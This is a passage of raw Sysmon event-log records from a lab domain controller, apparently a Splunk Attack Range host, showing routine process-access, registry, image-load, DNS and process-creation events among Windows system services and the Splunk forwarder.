STEM32\ntdll.dll+51791 10341000x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:38:59.504{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x46a88664) 10341000x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:28.426{59A5CD1D-8E46-6005-1100-00000000A301}1172644C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:28.426{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.426{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:39:28.395{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:39:28.395{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:39:28.395{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 734700x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.364{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\System32\dfsrs.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.277{59A5CD1D-8E56-6005-2F00-00000000A301}2276win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 
10341000x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
10341000x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
